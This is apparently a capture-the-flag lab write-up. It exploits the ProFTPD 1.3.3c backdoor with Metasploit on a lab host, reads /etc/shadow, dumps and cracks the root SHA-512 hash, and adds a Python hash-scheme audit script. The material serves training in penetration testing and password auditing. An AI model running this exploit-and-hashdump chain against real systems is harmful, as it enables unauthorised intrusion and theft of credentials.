# 🔬Hashes Dumping

## Lab 1

> 🔬 [Password Cracker: Linux](https://attackdefense.com/challengedetails?cid=1776)
>
> * Target IP: `192.75.64.3`
> * **Password Hashes** dumping - `/etc/shadow`

### Enumeration

```bash
ip -br -c a
# 192.75.64.2/24
```

```bash
nmap -sV 192.75.64.3
```

```bash
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
MAC Address: 02:42:C0:4B:40:03 (Unknown)
Service Info: OS: Unix
```

```bash
searchsploit ProFTPD 1.3.3
```

![searchsploit ProFTPD 1.3.3](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-2998d65d88935f13fcae33706703189283a81a08%2Fimage-20230323104830486.png?alt=media)

### Exploitation

```bash
service postgresql start && msfconsole -q
```

* PostgreSQL is started so that Metasploit can store loot and sensitive information gathered from the target machine - [Metasploit - PostgreSQL Workflows](https://docs.metasploit.com/docs/pentesting/metasploit-guide-postgresql.html)

```bash
setg RHOSTS 192.75.64.3
search proftpd
use exploit/unix/ftp/proftpd_133c_backdoor
run
```

```bash
/bin/bash -i
```

![Metasploit proftpd\_133c\_backdoor](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-b93f99778471aa898a2e10eb4692ccaa08a7d09e%2Fimage-20230323105525516.png?alt=media)

* Upgrade the session to a `meterpreter` session

```bash
# background the session with CTRL+Z
sessions -u 1
sessions 2
```

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-07c290ece0b18a509d58c4673b8e1aae28ba43a1%2Fimage-20230323105845671.png?alt=media)

### Hashes Dumping

```bash
cat /etc/shadow
```

![cat /etc/shadow](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-74e09f7997eafd7475c48d7e617ff56d9bf53322%2Fimage-20230323105952352.png?alt=media)

> 📌 `root`:`$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.`

* Gather Linux Password hashes with `Metasploit`

```bash
# background the session with CTRL+Z
search hashdump
use post/linux/gather/hashdump
set SESSION 2
run
```

```bash
[+] root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:0:0:root:/root:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20230323100234_default_192.75.64.3_linux.hashes_660271.txt
```

* The *unshadowed password file* combines each account entry with its password hash on a single line (as in the `root` line above), in a format that is ready to be cracked.
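
The `$6$` prefix in the dumped field identifies the hash as SHA-512 crypt, which is why the `SHA512` option is the one enabled for `crack_linux`. The following Python script is an added example, not part of the original lab notes: it parses shadow or unshadowed lines and reports the hashing scheme, salt and rounds per account, which is also how a defender would audit a host for weak schemes. The function names `classify` and `audit` are hypothetical, and every sample account except `root` is constructed.

```python
# Added example (not from the original lab): read the hash field of
# /etc/shadow or unshadowed lines. Layout per crypt(5): $id$[rounds=N$]salt$hash
SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}
WEAK = {"md5crypt", "descrypt", "empty"}

def classify(line):
    """Parse one 'user:hash[:...]' line into user, scheme, salt, rounds, weak."""
    user, field = line.rstrip("\n").split(":")[:2]
    info = {"user": user, "scheme": None, "salt": None, "rounds": None}
    if field == "":
        info["scheme"] = "empty"          # no password set
    elif field[0] in "!*":
        info["scheme"] = "locked"         # password login disabled
    elif field.startswith("$"):
        parts = field.split("$")[1:]      # drop the empty piece before the first $
        info["scheme"] = SCHEMES.get(parts[0], "other:" + parts[0])
        if parts[0] in SCHEMES:
            rest = parts[1:]
            # rounds=N is optional and only defined for the SHA-2 schemes
            if parts[0] in ("5", "6") and rest and rest[0].startswith("rounds="):
                info["rounds"] = int(rest[0][len("rounds="):])
                rest = rest[1:]
            info["salt"] = rest[0] if rest else None
    else:
        info["scheme"] = "descrypt"       # no $ prefix: treated as traditional DES crypt
    info["weak"] = info["scheme"] in WEAK
    return info

SAMPLE = [
    # root entry as printed by post/linux/gather/hashdump on this page
    "root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/"
    "Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:0:0:root:/root:/bin/bash",
    # constructed entries: hypothetical accounts with dummy hash text
    "svc:$1$abcdefgh$CONSTRUCTEDHASH:1001:1001::/home/svc:/bin/sh",
    "app:$6$rounds=100000$saltsalt$CONSTRUCTEDHASH:1002:1002::/home/app:/bin/sh",
    "daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
]

def audit(lines):
    """Classify every non-blank line."""
    return [classify(l) for l in lines if l.strip()]

if __name__ == "__main__":
    for row in audit(SAMPLE):
        print(row)
```

The `weak` flag reflects the hashing scheme only; a guessable password is recoverable regardless of the scheme protecting it.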

### Crack the Hash

```bash
search crack
use auxiliary/analyze/crack_linux
set SHA512 true
run
```

![Metasploit crack\_linux](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-23959298c9c2cf857044e9b8202dc42d51ade21a%2Fimage-20230323110756857.png?alt=media)

<details>

<summary>Reveal Flag - "root" password is: 🚩</summary>

`password`

<img src="https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-ccb0140f5960b1ad1d6126add1cebc521823d850%2Fimage-20230323110859459.png?alt=media" alt="" data-size="original">

</details>
